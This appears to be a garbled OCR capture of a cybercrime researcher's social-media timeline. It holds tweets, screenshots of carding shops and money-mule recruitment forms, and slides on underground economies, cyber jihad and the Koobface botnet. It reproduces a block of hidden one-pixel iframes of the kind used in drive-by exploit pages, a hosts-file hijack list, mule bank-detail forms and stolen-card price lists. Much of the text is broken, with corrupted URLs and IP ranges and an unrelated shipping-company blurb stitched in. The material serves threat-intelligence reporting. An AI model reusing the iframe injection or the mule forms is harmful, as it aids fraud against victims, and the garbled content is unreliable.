Meest-Chicago has become a dominant force in package delivery with services to Ukraine,
Russia, Belarus, Moldova, Uzbekistan, Kazakhstan, Kyrgyzstan, Georgia, Azerbaijan and
Armenia. Our specialized transportation and logistics services to those countries lead the way
as one of the most recognized brands in North America.


Founded in 2001, Meest-Chicago, Inc, a subsidiary of Meest Corporation Inc, is a package
delivery company with services to Eastern Europe as well as to all the countries of the former
Soviet Union. Over the years, Meest-Chicago, Inc has grown into an industry leader by focusing
on the goal of connecting customers in North America with their families, friends and
businesses in Eastern Europe. This also includes e-commerce between those countries.

Today, Meest-Chicago has become a dominant force in package delivery with services to
Ukraine, Russia, Belarus, Moldova, Uzbekistan, Kazakhstan, Kyrgyzstan and Georgia. Our
specialized transportation and logistics services to those countries lead the way as the most
recognized brand in North America.


Our mission is to provide the best international package delivery service at the most
competitive price on the market using the latest technology.


MEEST Chicago provides warehousing and consolidation services. Regardless of size, our
efficient warehousing solutions will give you the flexibility to meet changing demands of your
business with reduced transportation and storage costs. We will pack, prepare and customize
your goods for different market needs.


A wide network of representatives in the United States, Canada, Ukraine, and other countries
allows us to be always accessible to our customers. To locate a representative in your area,
please, call our toll free number (630) 889-1100


Working with MEEST CHICAGO can help you reduce the risks and costs due to our expertise in
customs clearance as well as regional transportation and logistics specifics in the countries
of the former Soviet Union


All company offices are joined by one sophisticated computer network that makes it possible
for our customers to track the status of your order at any time


courtesy of me while doing research. #security #cybercrime #malware 
#ThreatHunting #Threatintelligence #Threatintel https://t.co/KYI6VtOiiB 
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BUSINESS AT THE SPEED OF LIFE 


WELCOME TO YOUR SHIPPING PANEL


Your Shipping Panel LLC has become a dominant force in package delivery with services 


over the World. Our specialized transportation and logistics services over all countries lead 
the way as one of the most recognized brands in North America. 


Mission Global Transport & Logistics 
Sofia, Bulgaria. Circa 2010. Right before I got caught. Images courtesy of me. Back
then I met with @rivarichmond to discuss my findings and research on the Koobface
botnet. What a time it was. I even made it into the NYTimes -
https://t.co/uW1LOBMgsXM https://t.co/tlgqPOcNJhW
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
based on my research on credit cards selling E-Shops at the time. #security 
#cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/VyvnWFXlax 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/jzvreVzYal 


Home | Search Cards! Checkout | My orders | Balance: So,.00 | Support | Account | Service Rules | Help | Logou 


Load funds: 
Liberty Reserve: [ 


Statistic: 
Out of stock. 
_> 
Cvv 

Country Price Qt. 
Ag $10,00 i 
Au $8,00 i2 
Be $10,00 i 
Br $7,00 $3 
Ca $7,00 6 
Cn $10,00 2 
Co $10,00 3 
Es $10,00 3 
Fr $10,00 3 
Gb $9,00 1 
in $5,00 7 
Kr $8,00 i 
Mx $10,00 2 
Nl $10,00 2 
Nz $7,00 i 
Rj $10,00 2 
Sa $10,00 i 
Tr $6,00 i 
Uk $9,00 122 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/wn8lleOkQK 
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Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzZEzsHp]lk 
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/5ig4 LAWCcA 
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AS. aS3,537 


NET 


NEI 193.227.240.0/23 AS. aS35718 


Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/rLA5puAb66 
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ns1,1000dns,net 


f 
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212,113.32,0/19 
NET. 


PTE. 212.113.36.21.dc.ukrtelecom.ua 


4. 91.223.775 


AS 


AS 
wee AS68849 
NET 212.213.48,0/20 
PTR 
ut2.antiddos.org 
NET 85.17.0.0/16 AS. AS16265 


PTR 


hosted-byleaseweb.com 4 $5.17.134.129 


Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM 
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/oAXzO081QVC 
Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEZSH88QM
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel
https://t.co/FgZWPfWUji
Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEZSH88QM
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel
https://t.co/Ghm04aPsZK
Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/OebJnet4wa 


Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEZSH88QM
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel
https://t.co/DdU5QIESVt 


[Screenshot: shop menu (Main, Dumps, Tools, Checker, Purchased, Notifier, Refill Balance, Tickets, Profile, Rules, Cart) with the notice "You can use our service only after you refill your balance!"]
Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM
Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM
https://t.co/50SZnwl4Fo


Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/8qY6xFiwYL 
Random cybercrime ecosystem screenshots circa 2010. https://t.co/yzEzSH88QM
Remember TROYAK-AS? - https://t.co/jWmZOB4cDh Who would have thought? BGP
over VPN? Outstanding. #security #cybercrime #malware #ThreatHunting
#Threatintelligence #threatintel https://t.co/jQOGLLkOJv
Here’s a decent example of a money mule recruitment gang that’s blocking access to
my personal blog once a user installs their rogue certificate. - https://t.co/ytrCt6Gswl
#security #cybercrime #malware #ThreatHunting #ThreatIntelligence #threatintel
https://t.co/FXeYZYS6Kn #security #cybercrime #malware #Threatintelligence
#ThreatHunting #threatintel
22:37
Money mule recruiters "in the wild". Circa 2010. - https://t.co/uDr5P54stp #security
#cybercrime #malware #Threatintelligence #ThreatHunting #threatintel
https://t.co/jaNIUOPuxX!
Money mule recruiters "in the wild". Circa 2010. - https://t.co/uDr5P54stp #security
#cybercrime #malware #Threatintelligence #ThreatHunting #threatintel 
https://t.co/EWstxnNmRO 
[Screenshot: recruitment site transfer form (transfer type: Western Union) with fields for first name, last name, city, country, reference number (MTCN), Western Union fee and comments]
Money mule recruiters "in the wild". Circa 2010. - https://t.co/uDr5P54stp #security
https://t.co/KPtY QCS8F8


ISPSYSTEWAS elm): 13.33%
TimelNet (China): 18.33%
EUROACCESS (NL): 18.33%
VolumeDrive (U.S): 18.33%
KEYWEB-AS (Germany): 1.67%
Great Lakes Comnet (U.S): 15.00%
RoadRunner (U.S): 15.00%

http://ddanchev.blogspot.com


22:40
Money mule recruiters "in the wild". Circa 2010. - https://t.co/uDr5P54stp #security
#cybercrime #malware #ThreatIntelligence #ThreatHunting #threatintel
https://t.co/Yq9fmb2gu6
Employee Registration - Step 4

I confirm that I have contacted my bank directly and verified that:

[ ] my banking information (Account and Routing numbers) are correct.
[ ] my daily withdrawal limit is in fact $10,000.
[ ] my current account listed is active, as it may become inactive due to inactivity.
[ ] my account is able to receive funds on daily basis in the amount of $10,000.

In addition I certify that:

[ ] there is a branch of my bank located in my city/town and I am able to get there soon after task receipt.
[ ] there are Western Union and Money Gram locations in my city/town and I am aware of their exact addresses.

Next Step Back

*If you have any doubts or concerns to the above statements, please post-pone your registration until all of the information is
verified. You carry full liability for providing falsified information.

**Please bear in mind the Confidentiality Clause in your Agreement when contacting outside parties for information.

Money mule recruiters "in the wild". Circa 2010. - https://t.co/uDr5P54stp #security
#cybercrime #malware #Threatintelligence #ThreatHunting #threatintel
https://t.co/WnTiqNEYIK 


Name - Price

Blanks, forms, tables
Application form (ENG) $25.00
Application form electron. (ENG) $20.00
Application form short (ENG) $20.00
Cover form for sending MG (ENG) (ONE) $20.00
Cover form for sending MG (ENG) (SPLIT) $20.00
Cover form for sending WU (ENG) (ONE) $20.00
Cover form for sending WU (ENG) (SPLIT) $25.00
Spanish
Registration form (ESP) (.DOC) $35.00
Cover form for sending WU (ESP) (SPLIT) $30.00
Bank details form (ESP) (EEUU) $25.00
Form for a sent WU transfer (ESP) $20.00
Italian
Application form (ITAL) $30.00
Cover form for sending WU (ITAL) $20.00
Bank details form (ITAL) (EU) $25.00
Form for a sent WU transfer (ITAL) $25.00
Bank details forms
Bank Details Form /IBAN/ (ENG) $25.00
Bank Details Form /AU/ (ENG) $25.00
Bank Details Form /CA/ (ENG) $25.00
Bank Details Form /UK/ (ENG) $25.00
Bank Details Form /US/ (ENG) $25.00

14 - Tuesday 
https://t.co/ry6rS4XdhS #security #cybercrime #malware #CyberAttack
#CyberSecurity #cyberattacks #cybersecuritytips #cyberwar #CyberSec
04:37


https://t.co/ttyF3yred3 #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #cybersecuritytips #CyberSec #cyberwar #Threatintel 
#threatintelligence 


10:47 
https://t.co/JIcqOaYgET #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintelligence 


15 - Wednesday 


08:05 
Folks. I wanted to say big thanks to @whoisxmlapi for working with me to launch an
OpenCTI instance which I populate on a daily basis while working on the company’s
Law Enforcement Nautilus Feed. Apply here - https://t.co/VuSMB6njx5
https://t.co/ErAQGUx5Yx


*1 




16 - Thursday 
https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks
#cybersecuritytips #Threatintelligence https://t.co/WpJOEk208I 
Underground - Who’s Who in Cyber Crime for 2007?

<iframe src=./n404-1.htm width=1 height=1></iframe>
<iframe src=./n404-2.htm width=1 height=1></iframe>
<iframe src=./n404-3.htm width=1 height=1></iframe>
<iframe src=./n404-4.htm width=1 height=1></iframe>
<iframe src=./n404-5.htm width=1 height=1></iframe>
<iframe src=./n404-6.htm width=1 height=1></iframe>
<iframe src=./n404-7.htm width=1 height=1></iframe>
<iframe src=./n404-8.htm width=1 height=1></iframe>
<iframe src=./n404-9.htm width=1 height=1></iframe>

The Basics of OSINT/CYBERINT

• What is OSINT and how important it is to fighting Cyber Crime?
• Competitive Intelligence and OSINT
• (CYBERINT) as the convergence of HUMINT, SIGINT and OSINT online

02:34 


https://t.co/JTIcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/WM5xPId2qw 
The Basics of OSINT/CYBERINT - Cyber Intelligence Practices

• Tactical Intelligence - “I Want to Know God’s Thoughts, all Rest are Details”
  * consolidation of malicious parties
  * assessing their degree of collaboration
  * personalizing and profiling the groups
• Scenario Building Intelligence - Devil’s Advocate
• Understanding of OPSEC

02:34 


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/OOo5sezWil 
Dynamics of the Underground Economy

• Customer Service, Manuals and Video Tutorials
• Promotions and Bargain deals with commodity services and products
• Exclusive, customer-tailored and proprietary tools/services
• Localization to break the entry barriers
• Risk-hedging and risk-forwarding
• Customization of products/services
• Botnets, Malware, Spamming, Phishing On Demand


02:34 


https://t.co/JTIcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/yOxIMHeTY5 
United States-based credit card with card verification value
United Kingdom-based credit card with card verification value
An identity (including US bank account, credit card, date of birth, and government issued identification number)
List of 29,000 emails
Online banking account with a $9,900 balance
Yahoo Mail cookie exploit—advertised to facilitate full access when successful
Valid Yahoo and Hotmail email cookies
Compromised computer
Phishing Web site hosting—per site
Verified PayPal account with balance (balance varies)
Unverified PayPal account with balance (balance varies)
Skype account
World of Warcraft account—one month duration

Table 3. Advertised prices of items traded on underground economy servers
Source: Symantec Corporation

Advertised Price (in US Dollars)
$1-$6
$2-$12
$14-$18

https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/QYcMbudwub 
Who’s Who in Cyber Crime for 2007? - The Russian Business Network

• Started issuing fake “account suspended notices” upon getting “blogosphered”
• The enemy you know is better than the enemy you don’t know - no OPSEC policy
• Centralization => efficiency and ease of management => easy to block/traceback
• Chasing down the RBN - how to breathe down the RBN’s neck?


02:35 


https://t.co/JIcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/fjmb2nctE0 
Who’s Who in Cyber Crime for 2007? - Stormy Wormy

• Persistence, simplicity, and outdated vulnerabilities lead to the world’s largest botnet
• Storm Worm is not an Attack, it’s a Campaign
• Storm Worm is a Russian malware operation


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/ombkUJ9Gdx 
Who’s Who in Cyber Crime for 2007? - New Media Malware Gang

• Domain farms of live exploit URLs, malware C&C
• Has used and is still using RBN infrastructure
• Connection with Storm Worm and several high profile malware embedded attacks
• Same infrastructure is used by the RBN, Storm Worm and the New Media Malware Gang
• A Russian malware group

Who’s Who in Cyber Crime for 2007? - Ukrtelegroup Ltd

• Dispersed over several different netblocks - 86.200. 114."; 66.299:113.*; 88.259.94.."; 88.255.120.":
• Huge farm for hosting malware, downloaders update locations, live exploit URLs, malware C&C
• Cooperation with the RBN, Storm Worm Campaigners and the New Media Malware Gang
• Known RBN customers using their services


02:36 


https://t.co/JIcqOaYgET #security #cybercrime #malware #cyberattacks 
[Screenshot: areyoufearless.com - IE Exploiter v2 tool window]

Cyber Crime 1.0 and Cyber Crime 2.0 - DIY tools matured

[Screenshot: statistics panel (STATISTICS, BROWSERS, IPS, CONFIG, CLEANUP) with a per-country table of requests]


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/Tsx8gBzUII 
Conclusion and Key Summary Points

• http://ddanchev.blogspot.com - switchboard to real-time and historical threat intell
• dancho.danchev@gmail.com

Thank you for your time and attention!


https://t.co/JIcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/teDKr5 7ghT 
Basics of Mules Recruitment

• Requirements to join the group
  - Have been in “business” for at least 6 months
  - At least one recommendation from two cybercrime-friendly communities
Fe a 100 pers


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/YgMOkSI4ir 


What's it like to be a Money Mule?

Why are you gathering so much information about applicants? Such attention especially to bank account details puts me on guard.

You are responsible for reliability of this information. If you're having any difficulties please contact your bank.

Banking Details

Account Type*:
Bank Name*:
Account Type (checking/saving)*:
Name on the Account*:
Account Number*:
Routing Number for ACH transfer*:
Routing Number for Federal Wire Transfer*:
Date you opened your bank account*:
How often do you use your bank account?*:
Average amount of each operation*:
Is it a prepaid account?*:
Daily withdrawal limit over the counter*:
Have you ever used Western Union/Money Gram?*:
Are there Money Gram offices in your area?*:

[next step] back

https://t.co/JTIcqOaYgET #security #cybercrime #malware #cyberattacks
Profiling a key vendor of standardized recruitment templates

* Personal - 900$
  - Website in English
  - Correspondence from the first answer till the output
agreements,


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/qdZcz7UIBR 
When the recruiters go malicious

Sprott Asset Management is offering an executable SSL Certificate, which blocks access to
sites profiling money mule recruitment campaigns.


The HOSTS file was updated with the following URL-to-IP mappings: 


1 www.bobbear.co.uk
0.1 bobbear.co.uk 
-i1 reed.co.uk 
0.2 seek.com.au 
1 scam.com 
0.1 scambusters.org 
i www.guardian.co.uk 
maddanchey blogspot 


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/dcPVGcPGNz 


Responses to mule recruitment


* Currently favorable conditions 


= Lack@f,mass acc Spieny of virtual currency, allowing 
good Old fashioned “follow the money” techniques 


Active lid mules/victims are the best source of raw 


| at ti zing an inventory Offbank accounts, and 
rs erated by LE in order to infiltrate and 


I 5 sh \S S infrastructure allowing real-time 
s that haven't even been 


Cyber Jihad vs Cyberterrorism — Separating Hype
from Reality 


Dancho Danchev 


Cybercrime Researcher, Security Blogger at ZDNet, 
Security Blogger at Webroot Inc. 
https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks
#cybersecuritytips #Threatintelligence https://t.co/QLJUI5gvcS 


Presentation Outline

• Cyber Jihad VS Cyberterrorism — the basics
• Introduction to Cyber Jihad
• The current state of the Cyber Jihad threat
• The hacking tools and tactics used by Cyber Jihadists to support cyber operations
• Real life cases of Cyber Jihadists' cyber operations in action

RSA CONFERENCE EUROPE 2012

https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks
#cybersecuritytips #Threatintelligence https://t.co/ghW2pODzNp 


Overview of Cyber Jihadists' Literature

• The Technical Mujahid Magazine
• Cyber Jihadist's Encyclopedia
• Mujahideen Harvest Magazine
• INSPIRE Magazine

02:39 


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
The Technical Mujahid Magazine

Famous Cyber Jihadist Cases

• Irhabi007 - caught and prosecuted
• Jihad Jane — caught and prosecuted
• GIMF members — caught and prosecuted

Real life Cyber Jihadist Cyber Operations

• Al-Jinan's Electronic Jihad DoS Campaign
• Distribution of anti-infidel DIY Denial of Service Tools
• Muslims United Cyber DoS Campaign

Case study on GIMF

• First spotted in 2006 — released the “Night of Bush Capturing”
• Releases the “Mujahideen Secrets Encryption Tool”
• Used primarily WordPress.com for hosting
• Relied on Archive.org for video hosting
• Abuse campaign to expose their social network

Case study on GIMF

[Screenshot: encryption tool window with file shredder, symmetric cipher and file encrypt/decrypt options]

Top 5 Most Popular Cyberterrorism Myths

• Cyberterrorists actively plot to take down the Grid
• Cyberterrorists exclusively use steganography
• Cyberterrorists possess sophisticated hacking skills
• Cyberterrorists use bullet-proof hosting services
• Cyberterrorists have access to good programmers with software engineering degrees

[Who's Behind It?]

• Profiling the Koobface Gang — A Russian-Based Cybercrime-facilitating Group
  - KrotReal — active team member of Ali Baba and 40 cybercrime-friendly group
  - Two years active investigation
• Active community and ISP collaboration
• Active botnet infrastructure monitoring
• Multiple C&C server domains registered to typosquatted Dancho Danchev
• Active C&C server domains take down


https://t.co/JIcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/rxhhuOnAWG 
[Who's Behind It?]

• Active C&C server infrastructure monitoring and take down efforts
• 24 hours period of time for active C&C server take down
• Coordinated take down campaign across multiple ISPs including hosting providers
  * Koobface Gang to UKSERVERS-MNT - “we've been compromised”
• Koobface 1.0 goes Koobface 2.0 - social engineering, and ISP cooperation goes rogue

[Who's Behind It?]

• The gang is experimenting with alternative propagation strategies, such as for instance Skype
  * Koobface Gang: strange error. there're no experiments on that
• The gang is monetizing traffic through the Crusade Affiliates scareware network
  * Koobface Gang: maybe. not 100% sure


https://t.co/JTcqOaYgET #security #cybercrime #malware #cyberattacks 
#cybersecuritytips #Threatintelligence https://t.co/iu7fOcZqIV 


[Koobface Gang's Malicious Activity - Exposed]

• Scareware-serving Campaigns
• Black hat SEO (search engine optimization) utilized for traffic acquisition
• Social media propagation utilized for traffic acquisition
• Bahama botnet connection
• NYTimes malvertising campaign
• Scareware-serving campaigns primarily served fake Adobe Flash Players and YouTube players


18 - Saturday 


04:02 


04:02 


04:02 


04:02 


04:03 


04:04 
My latest report for @whoisxmlapi. Enjoy! https://t.co/CiB3VP4teA


My latest report for @whoisxmlapi. Enjoy! https://t.co/EixthIBT2D 


My latest report for @whoisxmlapi. Enjoy! https://t.co/9ZebMvlJ9P 


My latest report for @whoisxmlapi. Enjoy! https://t.co/vKqwfNKFTm 


My latest report for @whoisxmlapi. Enjoy! https://t.co/nEiH4X57Ml 


My latest report for @whoisxmlapi. Enjoy! https://t.co/51xVXaxeWe 


04:04 
My latest report for @whoisxmlapi. Enjoy! https://t.co/ExBPWp9II9 


*1 
04:04 

My latest report for @whoisxmlapi. Enjoy! https://t.co/JkOGIgzxOG 
04:04 

My latest report for @whoisxmlapi. Enjoy! https://t.co/qg9KIAOOh7t 
11:25 


How to Take Down the Conti Ransomware Gang - A Practical And Relevant Case Study 
on Taking Down Cybercriminal Infrastructure - A Practical Example - 
https://t.co/sgy3sdvc3e #ThreatHunting #Threatintel #Threatintelligence 
https://t.co/Ovg4nFqYk4 


22 *%2 


19 - Sunday 


09:02 


https://t.co/OmUajr8DT8 #security #cybercrime #malware #CyberSecurity 
#cybersecuritytips #cyberwar #CyberSecurityAwareness #Threatintelligence 
#threatintel https://t.co/Z7 7megoyyL 


21 ¥*1 


Free Maltego-Compatible STIX/STIX2/TAXII Threat Intelligence Feed


09:12 
https://t.co/JTcqOaYgET #Threatintelligence #threatintel https://t.co/WaADDIDZc 


Table 9: Quality of selected intelligence sources (10 out of 45) 


Columns: Blog, % of covered IOCs, % of covered IOC terms, % of timely IOCs, % of robust IOCs
2% 29 14% 
559 54% 


Dancho Danchev 42% 84% 
Naked Security 43% 45% 
THN 38% 51% 
Webroot 54% 3% 84% 
ThreatPost 26% 379 52% 29% 
TaoSecurity 57% Re 31% 68% 
Sucuri 44% 35% 3% 52% 
PaloAlto 39% Ne Ne 87% 
Malwarebytes 32% Ne 26% 72% 
Hexacom 49% ‘ 76% 


20 - Monday 


22:27 


Dear @Cryptome_org - I just sent you an email. I hope that you'll find some time to
go through it and feature the content on https://t.co/ZMA8wpFhvl. Thanks a lot for
featuring my memoir which I hope will be extremely useful and informative for your
readers.

22 - Wednesday


01:04 


My latest white paper for @whoisxmlapi - https://t.co/uvLZNkbnBd #security 
#cybercrime #malware #Threatintelligence #Threatintel #threathunting 


23 - Thursday 


09:20 


Discussing the #Ransomware FUD Wars - An Analysis - https://t.co/sOJOggxYor 
#security #cybercrime #malware #CyberAttack #CyberSecurity #threathunting 
#threatintelligence https://t.co/XL2Cy6gRf6 


09:23 


Oops. Looks like I did it again (https://t.co/eole2CdhmD) - check this out - I’m on
https://t.co/ZMA8wpFhvIl! - Part Two - https://t.co/UvbvQI9z6Z - here’s the original link
- https://t.co/TjmRcmohtj #security #cybercrime #malware #threatintelligence
https://t.co/yvsGgdldzA


Dancho Danchev's Blog - Compilation Archive 

hitps://archive org/download dancho-danchev-blog-e-book/ Dancho Danchev Blog E-Book zip 
Dancho Danchev's Security Research for Webroot circa 2012-2014 

Dancho Danchev Security Research ZDNet Zero Day Blog 


hitps.//archive org/download dancho-danchev-secunty-research-zdnet-zero-day- 
blog/Dancho Danchev Security Research ZDNet Zero Day Blog. pdf 


Dancho Danchev's Offensive Cyber Warfare Articles for Unit-123 


hitps.//1a801701 us archive ore/1$. items dancho-danchey-offensive-cwber-warfare-unit- 
122-Dancho_Danchey Offensive Cyber Warfare Unit-123 pdf 


Dancho Danchev's Security Research Compilation 

bitps://12801705 us archive. org/32/items dancho-danchev-security-research Dancho_Danchev Security Research pdf 

Dancho Danchev's “Assessing The Computer Network Operation (CNO) Capabilities of the Islamic Republic of Iran” - Report 
hips. archive org download iran 20210109 Tran rar 


Dancho Danchev’s "A Qualitative and Technical Collection OSINT-Enriched Analysis of the Iranian Hacking Scene Through the Prism of
the Infamous Ashiyane Digital Security Team" Report


Dancho Danchev’s Astalavista Security Group Security Newsletter 2003-2006 


hitps:/ia601 $08 us archive ore/13 items astalavista-security-group-security-newsletter-2003- 
2006/Astalavista. Secunty_ Group Security Newsletter 2003-2006 pdf 


Dancho Danchev's "Building and Implementing a Successful Information Security Policy” Security Publication 

bitps.//archive org download ‘secunty-policy, security-policy. pdf 

Dancho Danchev's Keynote at CyberCamp 2016 - Exposing Koobface - The World's Largest Botnet - Video 

hitps. archive ore download kevnote-exposing-koobface-dancho-danchey Keynote Exposing Koobface Dancho Danchev.mp4 


110 


Takes you back doesn’t it? - "Interview with Dancho Danchev" circa 2011 -
https://t.co/gwMRy031zU courtesy of @Malwarelnfosec. Hey. I was a teenager back
then therefore thanks for the interview request. Stay tuned!


11:15 


Here we go! - https://t.co/WIBGTU5ryT If it’s going to be massive it better be good. 
Grab an account today and show your support. In exchange I'll do my best to dazzle 
you with my cybercrime research and threat intelligence research "Know-how". Stay 

tuned! https://t.co/UwAA6vGgzv 


Offensive Warfare 2.0 - The Web's Primary Cybercrime Research OSINT And Threat Intelligence Central Clearing 
House 


Dancho Dancher ts the work's leading expert in the fekd of cyberctime fighting and threat intelligence gathering having actively pioneered his own methodlogy for procentts 
leacting to @ successful set of hundress of Pagt~quality acunpis act research a:tiches published at Ube industry's beating Uweat intelgence biog - ZDMet's Zero Day Du 
Infoemation Security Knowledge and Webroot's Threat Hog wath his research featured im Tectuseme, ZDNet, CNN, PCWorld, SCMagazine, TheRegister NYTimes, CHET, Computerworld, H»Magazine currently 
producing threat intelligence at the industry's leading threat intelligence blog - Dancho Danchev's - Mind Streams of Information Security Knowledge. With his research featured at RSA Europe,
CyberCamp, InfoSec, GCHQ and Interpol the researcher continues to actively produce threat intelligence at the industry's leading threat intelligence blog - Dancho Danchev's - Mind Streams of
Information Security Knowledge publishing a diverse set of hundreds of high-quality research analyses detailing the malicious and fraudulent activities of nation-state and malicious actors across the
globe. 15 Years of Actionable and Never-Published Actionable Threat Actor Specific Threat Intelligence - STIX/STIX2/TAXII and Maltego Transforms Compatible Information Exports and Direct Download
Available. API Key Integration Possible With EventLog Analyzer, ThreatConnect, Azure Sentinel, Splunk, Cisco, Elemendar, Cortex XSOAR, TrendMicro, ArcSight, Microsoft Sentinel, EventTracker, Plixer
Scrutinizer, Sumo Logic, Kaspersky CyberTrace, ServiceNow, CheckPoint ThreatCloud, Carbon Black EDR, Cisco Email Gateway, ThreatConnect, LogPoint, Tanium, Symantec, LogRhythm, Infoblox, Cloudera.
On a daily basis we offer unique and novel research and analysis including IoCs (Indicators of Compromise) and TTPs (Tactics Techniques and Procedures) in the following categories: Malware, Cyber
Jihad, Cyber Terrorism, Threat Actors, Phishing, Spam, IM malware, Mobile Malware, Mac OS X Malware, Android Malware, Blackhat SEO, Fraud, Money Mule Recruitment, Reshipping Mule Recruitment,
Malvertising, Ransomware, Scareware. He's also a founder and Chief Executive Officer at Stealth Startup, Cybercrime Researcher working under NDAs/CDAs/PLAs, DNS Threat Researcher at WhoisXML
API. His specialties include Cyber Intelligence, Cyber Threat Intelligence, Cyber Counter Threat Intelligence, CYBERINT, OSINT, "Real life" personalization of network assets, Multifaceted perspectives on
cybercrime incidents/groups/fraudulent schemes, Anticipation of emerging fraudulent models, In-depth understanding of monetization strategies within the cybercrime ecosystem,
Communicating/Presenting hardcore technical material/research findings to a diverse set of audiences. His key achievements include presented at the GCHQ with the Honeynet Project, SCMagazine
Who to Follow on Twitter for 201), participated in a chet. GCHQ Program called "Lovely Horse", identified a major victim of the SolarWinds Attack - PaloAltoNetworks, found malware on the Web
Site of Flashpoint, tracked monitored and profiled the Koobface Botnet and exposed one botnet operator, made it to Slashdot two times, my personal blog got SOM Page views since December 2005, my
old Twitter account got 11,000 followers, I had an average of 7000 RSS readers on my blog, I have my own vinyl "Blue Sabbath Black Cheer / Griefer - We Hate You Dancho Danchev" made by a Canadian
artist, Currently running Astalavista.box.sk, I gave an interview to DW on the Koobface Botnet, I gave an interview to NYTimes on the Koobface botnet, I gave an interview to Russian OSINT, Mivted as a
by Jeffrey Carr's Taia Global, presented at the GCHQ, presented at Interpol, presented at InfoSec, presented at CyberCamp, presented at RSA Europe


19251 


Who wants direct download access to my Cybercrime Forum Data Set for 2021? - 
https://t.co/rgsEandTx7 Empower yourself and your organization with a fresh set of 
situational awareness on the bad guys. #Threatintelligence #threathunting 
#threatintel https://t.co/pA8CK9QAbE 


*1

24 - Friday


05:08 




https://t.co/I8IN78UTpe https://t.co/nv3i5PTYOX 


05:09 


https://t.co/rgsEandTx7 https://t.co/QLIO3d202t 




07:35 


https://t.co/Z2Q6Hu2ChC https://t.co/ka6fHmUFLi 




10:43 


https://t.co/5dxYcYc8WH #security #cybercrime #malware #CyberAttack 
#CyberSecurity #cyberattacks #CyberSec #CyberWarrior #Threatintelligence 
#Threatintel #threathunting https://t.co/ga6WHsIUbO 


Offensive Warfare 2.0 - The Web's Primary Cybercrime Research OSINT And Threat Intelligence Central Clearing House

26 - Sunday


13:34 


Who wants to fight some bad guys? - https://t.co/jSWJyvWCRp #security 
#cybercrime #malware #CyberSecurity #cyberattacks #cybersecuritytips 
#threatintelligence #threatintel https://t.co/PeoxU6A6Eu 


21 %1 
Blog             % of covered IOCs   % of covered iocterms   % of timely IOCs   % of robust IOCs
Dancho Danchev   42%                 62%                     14%                84%
Naked Security   43%                 55%                     54%                45%
THN              38%                 38%                     41%                51%
Webroot          54%                 79%                     13%                84%
ThreatPost       26%                 37%                     52%                29%
TaoSecurity      57%                 61%                     31%                68%
Sucuri           34%                 35%                     43%                52%
PaloAlto         39%                 44%                     15%                87%
Malwarebytes     32%                 48%                     26%                72%
Hexacorn         49%                 57%                     59%                76%
13:35 


Who wants to fight some bad guys? - Part Two - https://t.co/IdtkK350v1G #security 
#cybercrime #malware #CyberSecurity #cyberattacks #cybersecuritytips 
#threatintelligence #threatintel https://t.co/sObXN39SSX 


21 *1
13:36


Who wants to fight some bad guys? - Part Three - https://t.co/NgagnW1xeC 
https://t.co/NgagnW1xeC #security #cybercrime #malware #CyberSecurity 
#cyberattacks #cybersecuritytips #threatintelligence #threatintel 
https://t.co/xbAoM3cAn0 


21 *1


13:37 


Who wants to fight some bad guys? - Part Four - https://t.co/VtdZPbVqmb #security 
#cybercrime #malware #CyberSecurity #cyberattacks #cybersecuritytips 
#threatintelligence #threatintel https://t.co/kcnWOuWg2n 


21 %*1
13:37


